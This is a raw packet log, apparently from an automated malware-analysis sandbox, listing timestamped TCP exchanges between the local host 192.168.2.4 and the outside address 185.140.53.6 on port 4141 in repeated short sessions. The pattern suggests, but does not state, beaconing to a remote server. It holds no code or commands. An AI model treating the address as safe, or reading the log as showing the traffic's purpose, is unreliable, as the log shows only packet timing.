                        Jan 24, 2022 02:24:37.408591032 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:37.492502928 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:37.492675066 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:37.493200064 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:37.705472946 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:37.705645084 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:38.014137030 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:38.014259100 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:38.120289087 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:38.120460987 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:38.442538023 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:38.442656040 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:38.739780903 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:38.739892960 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:38.925431013 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:38.925496101 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:38.925570011 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:38.925636053 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.027493000 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.027575970 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.027606010 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.027632952 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.027653933 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.027689934 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.027729034 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.027741909 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.114506960 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.114573002 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.114648104 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.114703894 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.114970922 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.115108967 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.115176916 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.115255117 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.115474939 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.115552902 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.115881920 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.115948915 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.174792051 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.174853086 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.174916983 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.174967051 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.206656933 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.207770109 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.245146990 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.245316029 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.251425982 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.251528025 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.251646042 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.251745939 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252021074 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252074957 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252114058 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252130032 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252171040 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252187014 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252223969 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252243996 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252274990 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252302885 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252331018 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252358913 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252393961 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252407074 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.252445936 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.252500057 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.263334990 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.273536921 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.273648977 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.280272961 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.280375004 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.302191973 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.302228928 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.302274942 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.302306890 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.302834034 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.302910089 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.323220015 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.323353052 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.346334934 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.346447945 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.346462011 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.346529007 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.346590042 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.346642971 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.346664906 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.346700907 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.348185062 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.348247051 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.360683918 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.360717058 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.360774040 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.360857964 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.362633944 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.362735033 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.363343000 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.363424063 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.363456964 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.363537073 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.363562107 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.363586903 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.363734961 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.363816977 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.363861084 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.363918066 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.364180088 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.364253998 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.364253998 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.364322901 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.364331007 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.364419937 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.364423037 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.364504099 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.364649057 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.364667892 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.364708900 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.364728928 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.383245945 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.383276939 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.383354902 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.383440971 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.383517981 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:39.383569002 CET414149750185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:39.383642912 CET497504141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:43.327009916 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:43.427885056 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:43.427999020 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:43.429089069 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:43.663881063 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:43.664010048 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:43.942087889 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:43.942183018 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:44.049165010 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:44.049268007 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:44.362993956 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:44.363816977 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:44.676683903 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:44.682086945 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:44.976146936 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:44.976308107 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:45.253715038 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:45.356730938 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:45.650305986 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:45.650461912 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:45.936439991 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:46.112698078 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:46.307492971 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:46.394717932 CET414149757185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:46.394824982 CET497574141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:50.368521929 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:50.485444069 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:50.486534119 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:50.487020016 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:50.722337961 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:50.722676992 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:51.003890038 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:51.005784035 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:51.083693981 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:51.083801985 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:51.429438114 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:51.429574013 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:51.497833014 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:51.590321064 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:52.029088020 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:52.113140106 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:52.123368979 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:52.193114042 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:52.194752932 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:52.295512915 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:52.312330008 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:52.312418938 CET414149760185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:52.312434912 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:52.312484980 CET497604141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:56.380264044 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:56.458019972 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:56.458558083 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:56.459194899 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:56.669147015 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:56.669284105 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:56.974210024 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:56.979274988 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:57.077589989 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:57.078526974 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:57.368175030 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:57.368356943 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:57.667697906 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:57.667825937 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:57.884011984 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:57.884057999 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:57.884102106 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:57.884130955 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.004960060 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.004996061 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.005086899 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.005223989 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.005295038 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.005348921 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.005458117 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.114811897 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.114869118 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.114917040 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.114939928 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.117283106 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.117361069 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.118033886 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.118110895 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.118588924 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.118665934 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.118987083 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.119061947 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.119199038 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.119271040 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.135512114 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.135618925 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.227009058 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.227056980 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.227129936 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.227153063 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.230164051 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.230245113 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.231482029 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.231560946 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.262813091 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.262841940 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.262862921 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.262877941 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.262898922 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.262922049 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.262981892 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.263041973 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.263118029 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.263171911 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.281258106 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.312982082 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.313056946 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.313102961 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.313133955 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.313177109 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.313220024 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.313239098 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.313275099 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.313358068 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.313427925 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.313925982 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.313971043 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.314083099 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.314698935 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.314747095 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.314790010 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.314841986 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.314857960 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.314867020 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.314892054 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.314929008 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.314985991 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.316462040 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.316509008 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.316602945 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.316656113 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.316715956 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.376971006 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.377027035 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.377060890 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.377123117 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.377136946 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.377170086 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.377206087 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.377253056 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.377274990 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.377305031 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.377329111 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.377412081 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.382419109 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.382486105 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.386871099 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.386912107 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.386949062 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.386981010 CET414149767185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:58.386992931 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:58.387032986 CET497674141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:02.432852030 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:02.520276070 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:02.523679972 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:02.524995089 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:02.740511894 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:02.795643091 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:03.059187889 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:03.252444983 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:03.252552032 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:03.552453041 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:03.552542925 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:03.856410980 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:03.856538057 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:04.151529074 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:04.151695967 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:04.485048056 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:04.485615969 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:04.802146912 CET414149774185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:04.802284002 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:04.843204975 CET497744141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:08.909041882 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:08.991251945 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:08.993172884 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:08.993737936 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:09.197350025 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:09.197468042 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:09.480386019 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:09.480475903 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:09.566212893 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:09.608647108 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:09.624562979 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:09.916590929 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:09.916716099 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.141670942 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.141786098 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.142817974 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.142894030 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.232790947 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.233354092 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.233393908 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.233460903 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.233695030 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.233756065 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.265347958 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.370759964 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.370820999 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.370861053 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.370908976 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.370933056 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.370944977 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.372203112 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.374588966 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.374675035 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.376411915 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.376455069 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.376472950 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.376504898 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.376550913 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.376605988 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.461359024 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.461947918 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.462030888 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.462201118 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.463074923 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.463201046 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.463752985 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.464096069 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.464153051 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.464716911 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.465941906 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.466001987 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.466238022 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.467788935 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.467844009 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.470149994 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.470330000 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.470963001 CET497774141192.168.2.4185.140.53.6
